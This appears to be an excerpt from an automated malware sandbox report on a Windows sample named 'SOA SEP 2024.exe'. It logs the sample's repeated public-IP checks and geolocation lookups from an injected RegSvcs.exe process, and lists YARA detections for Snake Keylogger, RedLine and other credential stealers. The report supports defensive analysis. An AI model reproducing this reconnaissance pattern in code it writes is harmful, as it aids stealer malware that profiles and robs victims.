Nov 22, 2024 07:47:06.986040115 CET	730	IN	HTTP/1.1 502 Bad Gateway Date: Fri, 22 Nov 2024 06:47:06 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: 11a471d37a513bf69dd461ea13d5ff2f Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 22, 2024 07:47:07.003618002 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 22, 2024 07:47:08.372770071 CET	320	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 06:47:08 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c8e94c3633d0a8761eaffc24377b479b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 22, 2024 07:47:11.025480032 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 22, 2024 07:47:11.490664959 CET	320	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 06:47:11 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 15c80ca2bc01e7edfbdd01524331a18e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49707	193.122.130.0	80	1560	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 07:47:13.333329916 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 22, 2024 07:47:15.476186037 CET	730	IN	HTTP/1.1 502 Bad Gateway Date: Fri, 22 Nov 2024 06:47:15 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: 89cabba473d5c90f7af4aaecee8d3887 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49709	193.122.130.0	80	1560	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 07:47:15.601291895 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 22, 2024 07:47:17.741354942 CET	730	IN	HTTP/1.1 502 Bad Gateway Date: Fri, 22 Nov 2024 06:47:17 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: 6c0d1336c788604ac7caeb7297559faf Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 22, 2024 07:47:17.745183945 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 22, 2024 07:47:19.073693991 CET	730	IN	HTTP/1.1 502 Bad Gateway Date: Fri, 22 Nov 2024 06:47:18 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: bd8c59d21224585c7620d1f502652f36 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49723	193.122.130.0	80	1560	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 07:47:19.198787928 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 22, 2024 07:47:21.468491077 CET	320	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 06:47:21 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 554a5dd7cd43ef30dfed750f2fed370d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49733	193.122.130.0	80	1560	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 07:47:23.310553074 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 22, 2024 07:47:25.458650112 CET	730	IN	HTTP/1.1 502 Bad Gateway Date: Fri, 22 Nov 2024 06:47:25 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: 83c97f911752223bb2aa9ebc497f0035 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	104.21.67.152	443	1560	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 06:47:10 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-22 06:47:10 UTC	854	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 06:47:10 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 221939 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WgMUxo%2BpmQ5rAPGyvCL4P%2BQMQlMBUu8wtal7aTW3GyDTwvK2%2B2jcXrsBZ5KyPrR6QijGOXOx9TrPPZMorV%2BIdoPb5pBDj5lHQz8sUXkVdXISojxdysPA3CTpwcGZYI2ZvH%2Fi74LY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e66f7749b8e43d0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2196&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4236&recv_bytes=698&delivery_rate=219565&cwnd=173&unsent_bytes=0&cid=55d02d754e4a727b&ts=795&x=0"
2024-11-22 06:47:10 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	104.21.67.152	443	1560	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 06:47:12 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-22 06:47:13 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 06:47:13 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 221942 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3jM0P%2B2KcsVHsruROFoJjxc2FhhAiH3d%2B0DGFSPkgMFeHc5UWxOIlbQEJXW8N9a%2BSpdxsrBJN1ripkYlsi%2FbvxLSEeabMpDLKWwhrS2%2FFGoS4RzSASIfSZWic%2BhdUOT4ypugrzIV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e66f7826b704268-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1601&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1768625&cwnd=252&unsent_bytes=0&cid=775694cd09e67cb8&ts=460&x=0"
2024-11-22 06:47:13 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49731	104.21.67.152	443	1560	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 06:47:22 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-22 06:47:23 UTC	849	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 06:47:23 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 221952 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h8G1p5srbu9i2OF1w%2F1wGSet2pBNqtQ4TEw%2ByndWnKSCondAe9Uckplv5cThulMexk95v7mo133AFh2XRghVzgZy6SlSWdzfvIBp2RJtf8fOnjmlyLJTYFxD7JwHWjOQZJAkqNZe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e66f7c0ce5f440e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1764&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1586956&cwnd=230&unsent_bytes=0&cid=0e5875c39c7e9582&ts=458&x=0"
2024-11-22 06:47:23 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Target ID:	0
Start time:	01:46:59
Start date:	22/11/2024
Path:	C:\Users\user\Desktop\SOA SEP 2024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SOA SEP 2024.exe"
Imagebase:	0x760000
File size:	1'146'368 bytes
MD5 hash:	3463C053C39DE2170AA78B8AA253E999
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2102007208.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:47:01
Start date:	22/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SOA SEP 2024.exe"
Imagebase:	0xc90000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4553786112.0000000003359000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.4552483120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 